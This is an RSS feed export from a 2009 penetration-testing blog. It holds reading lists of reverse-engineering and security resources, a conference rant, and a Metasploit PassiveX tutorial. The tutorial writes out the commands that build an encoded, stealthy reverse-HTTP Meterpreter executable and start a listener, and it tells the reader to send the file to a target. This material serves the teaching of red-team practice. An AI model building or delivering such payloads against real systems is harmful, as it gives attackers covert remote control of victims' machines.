Related posts:<ol><li><a href='http://www.room362.com/archives/569-getting-your-fill-of-security.html' rel='bookmark' title='Permanent Link: Getting your fill of Security'>Getting your fill of Security</a> <small>I recently posted a blog post to Exotic Liability’s website...</small></li><li><a href='http://www.room362.com/archives/187-runtime-packers-hold-the-cheese.html' rel='bookmark' title='Permanent Link: Runtime Packers &#8211; hold the cheese'>Runtime Packers &#8211; hold the cheese</a> <small> So we are taking a short break from my...</small></li><li><a href='http://www.room362.com/archives/178-defcon-16-the-tools-not-the-toools.html' rel='bookmark' title='Permanent Link: DEFCON 16: The Tools not the Toools'>DEFCON 16: The Tools not the Toools</a> <small>Originally posted to the Zero Day blog on Ziff Davis:...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.exoticliability.com/profile/Matt">Matt</a>, from the <a href="http://www.exoticliability.com/">Exotic Liability</a> <a href="http://www.exoticliability.com/forum/">forums</a>, posed a suggestion for a episode: &#8220;<a href="http://www.exoticliability.com/forum/topics/getting-started-reverse">Getting started [in] reverse engineering hardware drivers?</a>&#8220;. I thought this was an interesting topic to attack so, I dug a bit into my RSS feed pile of goo and compiled this list of links. Hope this helps Matt.</p>
<p><strong> </strong></p>
<h2><strong>Individuals &#8212;</strong></h2>
<p><strong> </strong></p>
<p><strong> </strong>Skywing &#8211; <a href="http://www.nynaeve.net/">http://www.nynaeve.net/</a><br />
Egypt &#8211; <a href="http://0xegypt.blogspot.com/">http://0xegypt.blogspot.com/</a><br />
Yoni &#8211; <a href="http://zeroflag.wordpress.com/">http://blogs.msdn.com/michael_howard/</a><br />
Raymond Chen &#8211; <a href="http://blogs.msdn.com/oldnewthing/">http://blogs.msdn.com/oldnewthing/</a><br />
Sia0 &#8211; <a href="http://blogs.msdn.com/michkap/">http://blogs.msdn.com/michkap/</a><br />
Rob P &#8211; <a href="http://geekswithblogs.net/robp/Default.aspx">http://geekswithblogs.net/robp/Default.aspx</a><br />
Quantam &#8211; <a href="http://qstuff.blogspot.com/">http://qstuff.blogspot.com/</a><br />
Phn1x &#8211; <a href="http://hamsterswheel.com/techblog/">http://hamsterswheel.com/techblog/</a><br />
Halavar Flake &#8211; <a href="http://addxorrol.blogspot.com/">http://addxorrol.blogspot.com/</a><br />
Pedram &#8211; <a href="http://pedram.redhive.com/blog">http://pedram.redhive.com/blog</a><br />
Tyler Shields &#8211; <a href="http://www.donkeyonawaffle.org/">http://www.donkeyonawaffle.org/</a><br />
Wesley Shields &#8211; <a href="http://www.atarininja.org/">http://www.atarininja.org/</a><br />
Peter Wieland &#8211; <a href="http://blogs.msdn.com/peterwie/">http://blogs.msdn.com/peterwie/</a><br />
Michael Howard &#8211; <a href="http://blogs.msdn.com/michael_howard/">http://blogs.msdn.com/michael_howard/</a><br />
Doron Holan &#8211; <a href="http://blogs.msdn.com/doronh/">http://blogs.msdn.com/doronh/</a><br />
Nico Waisman &#8211; <a href="http://eticanicomana.blogspot.com/">http://eticanicomana.blogspot.com/</a><br />
Dmitry Vostokov &#8211; <a href="http://www.dumpanalysis.org/blog/">http://www.dumpanalysis.org/blog/</a><br />
Nicolas Sylvain &#8211; <a href="http://nsylvain.blogspot.com/">http://nsylvain.blogspot.com/</a><br />
Alex Ionescu &#8211; <a href="http://www.alex-ionescu.com/">http://www.alex-ionescu.com/</a><br />
Mattheiu Suiche &#8211; <a href="http://www.msuiche.net/">http://www.msuiche.net/</a><br />
Larry Osterman &#8211; <a href="http://blogs.msdn.com/larryosterman/">http://blogs.msdn.com/larryosterman/</a><br />
Koby Kahane &#8211; <a href="http://kobyk.wordpress.com/">http://kobyk.wordpress.com/</a><br />
Jason Geffner &#8211; <a href="http://malwareanalysis.com/communityserver/blogs/geffner/default.aspx">http://malwareanalysis.com/communityserver/blogs/geffner/default.aspx</a><br />
Ero Carrera &#8211; <a href="http://blog.dkbza.org/">http://blog.dkbza.org/</a><br />
Dino Dai Zovi &#8211; <a href="http://blog.trailofbits.com/">http://blog.trailofbits.com/</a><br />
Ilja &#8211; <a href="http://blogs.23.nu/ilja/">http://blogs.23.nu/ilja/</a><br />
Nate Lawson &#8211; <a href="http://rdist.root.org/">http://rdist.root.org/</a><br />
Mark Russinovich &#8211; <a href="http://blogs.technet.com/markrussinovich/">http://blogs.technet.com/markrussinovich/</a><br />
Jose Nazario &#8211; <a href="http://www.wormblog.com/">http://www.wormblog.com/</a><br />
Jonathan Morrison &#8211; <a href="http://blogs.msdn.com/itgoestoeleven/">http://blogs.msdn.com/itgoestoeleven/</a><br />
John Robbins &#8211; <a href="http://www.wintellect.com/cs/blogs/jrobbins/default.aspx">http://www.wintellect.com/cs/blogs/jrobbins/default.aspx</a><br />
Ilias Tsigkogiannis &#8211; <a href="http://blogs.msdn.com/iliast/">http://blogs.msdn.com/iliast/</a><br />
Daniel Reynaud &#8211; <a href="http://indefinitestudies.org/">http://indefinitestudies.org/</a><br />
Joanna Rutkowska &#8211; <a href="http://theinvisiblethings.blogspot.com/">http://theinvisiblethings.blogspot.com/</a><br />
Matthieu Kaczmarek &#8211; <a href="http://www.loria.fr/~kaczmare/index.en.htm">http://www.loria.fr/~kaczmare/index.en.htm</a><br />
Silvio Cesare &#8211; <a href="http://silviocesare.wordpress.com/">http://silviocesare.wordpress.com/</a><br />
Philippe Beaucamps &#8211; <a href="http://www.loria.fr/~beaucphi/">http://www.loria.fr/~beaucphi/</a><br />
Debugging Toolbox &#8211; <a href="http://blogs.msdn.com/debuggingtoolbox/">http://blogs.msdn.com/debuggingtoolbox/</a><a href="http://www.loria.fr/~beaucphi/"></a></p>
<p>Fravia&#8217;s saved works (RIP) &#8211; <a href="http://www.woodmann.com/fravia/index.htm">http://www.woodmann.com/fravia/index.htm</a></p>
<h2>Groups &#8212;</h2>
<p>Offensive Computing &#8211; <a href="http://www.offensivecomputing.net/">http://www.offensivecomputing.net/</a><br />
The Cover of Night &#8211; <a href="http://www.thecoverofnight.com/blog/">http://www.thecoverofnight.com/blog/</a><br />
LHS &#8211; <a href="http://lhs.loria.fr/">http://lhs.loria.fr/</a><br />
NT Debugging &#8211; <a href="http://blogs.msdn.com/ntdebugging/">http://blogs.msdn.com/ntdebugging/</a><br />
Hex Blog &#8211; <a href="http://www.hexblog.com/">http://www.hexblog.com/</a><br />
Engineering for Fun &#8211; <a href="http://blog.engineeringforfun.com/">http://blog.engineeringforfun.com/</a></p>
<h2>Company &#8212;</h2>
<p>OpenRCE &#8211; <a href="http://www.openrce.org/articles/">http://www.openrce.org/articles/</a><br />
DV Labs &#8211; <a href="http://dvlabs.tippingpoint.com/blog/">http://dvlabs.tippingpoint.com/blog/</a><br />
Matasano &#8211; <a href="http://www.matasano.com/log/">http://www.matasano.com/log/</a><br />
VeraCode &#8211; <a href="http://www.veracode.com/blog/">http://www.veracode.com/blog/</a><br />
Trend Micro &#8211; <a href="http://blog.trendmicro.com/">http://blog.trendmicro.com/</a></p>
<h2>Forums &#8212;</h2>
<p>Reverse Engineering &#8211; <a href="http://community.reverse-engineering.net/index.php">http://community.reverse-engineering.net/index.php</a><br />
OpenRCE &#8211; <a href="http://www.openrce.org/forums/">http://www.openrce.org/forums/</a><br />
Assembly Forums &#8211; <a href="http://www.asmcommunity.net/board/">http://www.asmcommunity.net/board/</a></p>
<h2>Sandboxing and Analysis &#8212;</h2>
<p>Joe Box &#8211; <a href="http://www.joebox.org/">http://www.joebox.org/</a><br />
Virus Total &#8211; <a href="http://www.virustotal.com/">http://www.virustotal.com/</a><br />
Wepawet &#8211; <a href="http://wepawet.cs.ucsb.edu/">http://wepawet.cs.ucsb.edu/</a><br />
F-Secure -<a href="http://www.f-secure.com/en_US/security/security-lab/">http://www.f-secure.com/en_US/security/security-lab/</a><br />
Anubis &#8211; <a href="http://anubis.iseclab.org/">http://anubis.iseclab.org/</a><br />
Jotti &#8211; <a href="http://virusscan.jotti.org/en">http://virusscan.jotti.org/en</a><br />
Sunbelt CWSandbox &#8211; <a href="http://www.sunbeltsecurity.com/Submit.aspx?type=cwsandbox&amp;cs=A41CD150B37359889A553671CBFD2360">http://www.sunbeltsecurity.com/Submit.aspx?type=cwsandbox&amp;cs=A41CD150B37359889A553671CBFD2360</a></p>
<h2>Misc &#8212;</h2>
<p>Code Breakers Journal &#8211; <a href="http://www.codebreakers-journal.com/">http://www.codebreakers-journal.com/</a><br />
The Art of Assembly &#8211; <a href="http://webster.cs.ucr.edu/AoA/DOS/AoADosIndex.html">http://webster.cs.ucr.edu/AoA/DOS/AoADosIndex.html</a><br />
Intel Processor Instruction Set A-M/N-Z &#8211; <a href="http://www.intel.com/products/processor/manuals/">http://www.intel.com/products/processor/manuals/</a><br />
WASM.ru with translation &#8211; <a href="http://66.196.80.202/babelfish/translate_url_content?lp=ru_en&amp;url=http://www.wasm.ru&amp;.intl=us">http://66.196.80.202/babelfish/translate_url_content?lp=ru_en&amp;url=http://www.wasm.ru&amp;.intl=us</a></p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/569-getting-your-fill-of-security.html' rel='bookmark' title='Permanent Link: Getting your fill of Security'>Getting your fill of Security</a> <small>I recently posted a blog post to Exotic Liability’s website...</small></li><li><a href='http://www.room362.com/archives/187-runtime-packers-hold-the-cheese.html' rel='bookmark' title='Permanent Link: Runtime Packers &#8211; hold the cheese'>Runtime Packers &#8211; hold the cheese</a> <small> So we are taking a short break from my...</small></li><li><a href='http://www.room362.com/archives/178-defcon-16-the-tools-not-the-toools.html' rel='bookmark' title='Permanent Link: DEFCON 16: The Tools not the Toools'>DEFCON 16: The Tools not the Toools</a> <small>Originally posted to the Zero Day blog on Ziff Davis:...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/Hv960xmSO9ZNoDtuAR0I9_KR10o/0/da"><img src="http://feedads.g.doubleclick.net/~a/Hv960xmSO9ZNoDtuAR0I9_KR10o/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/Hv960xmSO9ZNoDtuAR0I9_KR10o/1/da"><img src="http://feedads.g.doubleclick.net/~a/Hv960xmSO9ZNoDtuAR0I9_KR10o/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=g6-xR7JJUTE:5ENs8QdbhPU:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=g6-xR7JJUTE:5ENs8QdbhPU:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=g6-xR7JJUTE:5ENs8QdbhPU:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=g6-xR7JJUTE:5ENs8QdbhPU:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=g6-xR7JJUTE:5ENs8QdbhPU:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/g6-xR7JJUTE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/585-getting-your-fill-of-reverse-engineering-and-malware-analysis.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Rant Back – ValSmith</title>
		<link>http://www.room362.com/archives/581-rant-back-%e2%80%93-valsmith.html</link>
		<comments>http://www.room362.com/archives/581-rant-back-%e2%80%93-valsmith.html#comments</comments>
		<pubDate>Thu, 11 Jun 2009 02:11:47 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Rant]]></category>
		<category><![CDATA[attackresearch]]></category>
		<category><![CDATA[carnal0wnage]]></category>
		<category><![CDATA[conferences]]></category>
		<category><![CDATA[defcon]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[shmoocon]]></category>
		<category><![CDATA[valsmith]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=581</guid>
		<description><![CDATA[Val Smith recently wrote a post on the new Attack Research / carnal0wnage blog titled:
”Security Conferences, pen tests and incident response”
Here are my thoughts on what he wrote:
In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html' rel='bookmark' title='Permanent Link: Sexism and the religion of hackers'>Sexism and the religion of hackers</a> <small>Let me preempt this post with the following facts: I...</small></li><li><a href='http://www.room362.com/archives/210-security-guards-without-guns.html' rel='bookmark' title='Permanent Link: Security Guards without guns'>Security Guards without guns</a> <small> I have had this rant on Twitter (if they had threading...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>Val Smith recently wrote a post on the new <a href="http://carnal0wnage.attackresearch.com">Attack Research / carnal0wnage blog</a> titled:<br />
”<a href="http://carnal0wnage.attackresearch.com/node/361">Security Conferences, pen tests and incident response</a>”</p>
<p>Here are my thoughts on what he wrote:</p>
<p>In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the lime light or to pimp some product/0day. And the second being a lot of the talks are things that most can’t go home / back to work and test out or implement.</p>
<p>I agree with him on both points.</p>
<p>On the first point I think that one detail was left out of this evaluation. Size. Back when DEFCON was &lt;500 people, almost everyone knew each other. 90% of those attending had the passion, had the fire for that what makes our line of work such an art. Now that our community has become “popular”, that percentage is around 20-30%. These numbers aren’t based on any stats, just something that I have been observing as well.</p>
<p>On the second point, my first security conference was ShmooCon ‘06. I was glued to might seat in each talk I attended, and in just 3 short years I have seen EXACTLY what he’s talking about. I used to have to decide between awesome talks in the same hour. Now I actually find times where I’m not interested in anything being presented for that hour. But, rooms still get packed so I guess that’s just my own pickiness.</p>
<p>Penetration Testing and Incident is the second portion of his post and I really think he’s hit the nail on the head, Pen Testing and Incident Response should work closely together. I want to throw Vulnerability Assessment and Forensics into the mix as well, feeding each other, sharing data, and assisting. The segmentation of duties / teams is killing collaboration.</p>
<p>Lets get back to the basics, and really show what this community is capable of.</p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html' rel='bookmark' title='Permanent Link: Sexism and the religion of hackers'>Sexism and the religion of hackers</a> <small>Let me preempt this post with the following facts: I...</small></li><li><a href='http://www.room362.com/archives/210-security-guards-without-guns.html' rel='bookmark' title='Permanent Link: Security Guards without guns'>Security Guards without guns</a> <small> I have had this rant on Twitter (if they had threading...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/7rahe0Lcj1-pk09hstcwr1rrOyg/0/da"><img src="http://feedads.g.doubleclick.net/~a/7rahe0Lcj1-pk09hstcwr1rrOyg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/7rahe0Lcj1-pk09hstcwr1rrOyg/1/da"><img src="http://feedads.g.doubleclick.net/~a/7rahe0Lcj1-pk09hstcwr1rrOyg/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=yHCNaO07oxI:h_NJdo7nnAs:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=yHCNaO07oxI:h_NJdo7nnAs:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=yHCNaO07oxI:h_NJdo7nnAs:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=yHCNaO07oxI:h_NJdo7nnAs:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=yHCNaO07oxI:h_NJdo7nnAs:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/yHCNaO07oxI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/581-rant-back-%e2%80%93-valsmith.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>PassiveX fun with Metasploit</title>
		<link>http://www.room362.com/archives/575-passivex-fun-with-metasploit.html</link>
		<comments>http://www.room362.com/archives/575-passivex-fun-with-metasploit.html#comments</comments>
		<pubDate>Wed, 10 Jun 2009 13:21:05 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[passivex]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=575</guid>
		<description><![CDATA[I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/274-metasploit.html' rel='bookmark' title='Permanent Link: Metasploit heart&#8217;s Microsoft'>Metasploit heart&#8217;s Microsoft</a> <small> Hiding Meterpreter with IExpress from mubix on Vimeo. Using...</small></li><li><a href='http://www.room362.com/archives/196-the-root-of-all-evil-grade.html' rel='bookmark' title='Permanent Link: The Root of All Evil-(grade)'>The Root of All Evil-(grade)</a> <small>So there I was&#8230; Today I was sitting at home...</small></li><li><a href='http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html' rel='bookmark' title='Permanent Link: Metasploit Framework as a Payload'>Metasploit Framework as a Payload</a> <small>Well, sorta… I created a meterpreter script that takes the...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the <a href="http://www.room362.com/archives/440-metasploit-2.html">IExpress “hack”</a> would make for an very hard to spot payload.</p>
<p>A really down and dirty explination of what PassiveX is and why it&#8217;s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).</p>
<p>(props to skape for writting PassiveX and @<a href="http://twitter.com/_natron_">_natron_</a> for kicking in the latest tweaks to make it work with IE7/IE8)</p>
<p><strong>Here are the options for msfpayload:</strong></p>
<p>Usage: ./msfpayload &lt;payload&gt; [var=val] &lt;S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA&gt;</p>
<p><strong>And msfencode&#8217;s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):</strong></p>
<p>./msfencode -h</p>
<p>Usage: ./msfencode &lt;options&gt;</p>
<p>OPTIONS:</p>
<p>-a &lt;opt&gt;&#160; The architecture to encode as   <br />-b &lt;opt&gt;&#160; The list of characters to avoid: &#8216;\x00\xff&#8217;    <br />-c &lt;opt&gt;&#160; The number of times to encode the data    <br />-e &lt;opt&gt;&#160; The encoder to use    <br />-h&#160;&#160;&#160;&#160;&#160;&#160;&#160; Help banner    <br />-i &lt;opt&gt;&#160; Encode the contents of the supplied file path    <br />-l&#160;&#160;&#160;&#160;&#160;&#160;&#160; List available encoders    <br />-m &lt;opt&gt;&#160; Specifies an additional module search path    <br />-n&#160;&#160;&#160;&#160;&#160;&#160;&#160; Dump encoder information    <br />-o &lt;opt&gt;&#160; The output file    <br />-s &lt;opt&gt;&#160; The maximum size of the encoded data    <br />-t &lt;opt&gt;&#160; The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)</p>
<p><strong>Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:</strong></p>
<p>./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe</p>
<p>[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)</p>
<p><strong>Now that we have our &quot;malicious payload&quot; in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):</strong></p>
<p>./msfconsole</p>
<p>_   <br />| |&#160;&#160;&#160;&#160;&#160; o    <br />_&#160; _&#160; _&#160;&#160;&#160; _ _|_&#160; __,&#160;&#160; ,&#160;&#160;&#160; _&#160; | |&#160; __&#160;&#160;&#160; _|_    <br />/ |/ |/ |&#160; |/&#160; |&#160; /&#160; |&#160; / \_|/ \_|/&#160; /&#160; \_|&#160; |    <br />|&#160; |&#160; |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/    <br />/|    <br />\|</p>
<p>=[ msf v3.3-dev   <br />+ -- --=[ 376 exploits - 234 payloads    <br />+ -- --=[ 20 encoders - 7 nops    <br />=[ 153 aux</p>
<p>msf &gt; use multi/handler   <br />msf exploit(handler) &gt; exploit -h</p>
<p><strong>(I'm showing you 'exploit's options because a lot of people don't know they exist. With two lines you can start your listener (use, then exploit):</strong></p>
<p>Usage: exploit [options]   <br />Launches an exploitation attempt.</p>
<p>OPTIONS:   <br />-e &lt;opt&gt;&#160; The payload encoder to use.&#160; If none is specified, ENCODER is used.    <br />-h&#160;&#160;&#160;&#160;&#160;&#160;&#160; Help banner.    <br />-j&#160;&#160;&#160;&#160;&#160;&#160;&#160; Run in the context of a job.    <br />-n &lt;opt&gt;&#160; The NOP generator to use.&#160; If none is specified, NOP is used.    <br />-o &lt;opt&gt;&#160; A comma separated list of options in VAR=VAL format.    <br />-p &lt;opt&gt;&#160; The payload to use.&#160; If none is specified, PAYLOAD is used.    <br />-t &lt;opt&gt;&#160; The target index to use.&#160; If none is specified, TARGET is used.    <br />-z&#160;&#160;&#160;&#160;&#160;&#160;&#160; Do not interact with the session after successful exploitation.</p>
<p>msf exploit(handler) &gt; exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False</p>
<p>[*] Exploit running as background job.   <br />[*] PassiveX listener started.    <br />[*] Starting the payload handler&#8230;</p>
<p>msf exploit(handler) &gt;</p>
<p><strong>Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you&#8217;re set.</strong></p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/274-metasploit.html' rel='bookmark' title='Permanent Link: Metasploit heart&#8217;s Microsoft'>Metasploit heart&#8217;s Microsoft</a> <small> Hiding Meterpreter with IExpress from mubix on Vimeo. Using...</small></li><li><a href='http://www.room362.com/archives/196-the-root-of-all-evil-grade.html' rel='bookmark' title='Permanent Link: The Root of All Evil-(grade)'>The Root of All Evil-(grade)</a> <small>So there I was&#8230; Today I was sitting at home...</small></li><li><a href='http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html' rel='bookmark' title='Permanent Link: Metasploit Framework as a Payload'>Metasploit Framework as a Payload</a> <small>Well, sorta… I created a meterpreter script that takes the...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/vy3cHcTlbCuXDHY4BOXla-_qhr0/0/da"><img src="http://feedads.g.doubleclick.net/~a/vy3cHcTlbCuXDHY4BOXla-_qhr0/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/vy3cHcTlbCuXDHY4BOXla-_qhr0/1/da"><img src="http://feedads.g.doubleclick.net/~a/vy3cHcTlbCuXDHY4BOXla-_qhr0/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=X_dQ5La9844:GizpFR0MHEg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=X_dQ5La9844:GizpFR0MHEg:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=X_dQ5La9844:GizpFR0MHEg:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=X_dQ5La9844:GizpFR0MHEg:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=X_dQ5La9844:GizpFR0MHEg:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/X_dQ5La9844" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/575-passivex-fun-with-metasploit.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Getting your fill of Security</title>
		<link>http://www.room362.com/archives/569-getting-your-fill-of-security.html</link>
		<comments>http://www.room362.com/archives/569-getting-your-fill-of-security.html#comments</comments>
		<pubDate>Fri, 29 May 2009 19:35:22 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[learning]]></category>
		<category><![CDATA[links]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=569</guid>
		<description><![CDATA[I recently posted a blog post to Exotic Liability’s website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/598-local-security-dc-nova-md.html' rel='bookmark' title='Permanent Link: Local Security &#8211; DC-NoVA-MD'>Local Security &#8211; DC-NoVA-MD</a> <small>Looking for local events? I&#8217;ve gotten a lot of people...</small></li><li><a href='http://www.room362.com/archives/209-sbn-move-to-lijit.html' rel='bookmark' title='Permanent Link: SBN move to Lijit'>SBN move to Lijit</a> <small>Alan posted this about the SBN: Well there is not...</small></li><li><a href='http://www.room362.com/archives/585-getting-your-fill-of-reverse-engineering-and-malware-analysis.html' rel='bookmark' title='Permanent Link: Getting your fill of Reverse Engineering and Malware Analysis'>Getting your fill of Reverse Engineering and Malware Analysis</a> <small>Matt, from the Exotic Liability forums, posed a suggestion for...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>I recently posted a <a href="http://www.exoticliability.com/profiles/blogs/getting-your-fill-of-security">blog post</a> to <a href="http://www.exoticliability.com/">Exotic Liability</a>’s website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your fill of security:</p>
<p><strong>Podcasting:</strong>    <br />GetMon &#8211; <a href="http://www.getmon.com/">http://www.getmon.com/</a> &#8211; This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.    <br />HackerMedia &#8211; <a href="http://www.hackermedia.org/">http://www.hackermedia.org/</a> &#8211; They put together like podcasts into different categories, and they overlap. So if you want the &quot;Linux&quot; feed, you&#8217;ll get podcast A, B, and C. But maybe podcast C does Linux security, so if you subscribe to the &quot;Security&quot; feed, you might get C, E, and G. You can also get the everything feed</p>
<p><strong>Bloggers (RSS Feeds):</strong>    <br />Security Bloggers Network &#8211; <a href="http://www.securitybloggers.net/">http://www.securitybloggers.net/</a> &#8211; A consolidated feed of a HUGE list of security blogs</p>
<p><strong>Twitter:     <br /></strong>Security Twits &#8211; <a href="http://www.security-twits.com/">http://www.security-twits.com/</a> &#8211; A long list of security related twitter accounts. From people to events, to companies.</p>
